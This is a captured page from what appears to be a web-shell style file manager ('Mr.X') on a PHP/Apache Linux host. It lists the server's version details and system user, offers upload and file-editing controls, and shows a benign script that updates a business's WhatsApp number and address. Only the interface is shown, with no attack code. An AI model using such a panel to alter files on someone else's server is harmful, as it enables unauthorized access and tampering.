🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:update_contact_info.php
<?php include 'config.php'; // Update WhatsApp Number updateSetting('whatsapp_number', '94760609169'); // Create address setting if it doesn't exist and update it $conn->query("INSERT IGNORE INTO settings (setting_key, setting_value) VALUES ('site_address', '410 Galle Road Colombo 03. 1B 1st Floor Lalsons Building')"); updateSetting('site_address', '410 Galle Road Colombo 03. 1B 1st Floor Lalsons Building'); echo "Settings updated successfully!"; ?>
Save Changes
Cancel
Create New File
Create New Folder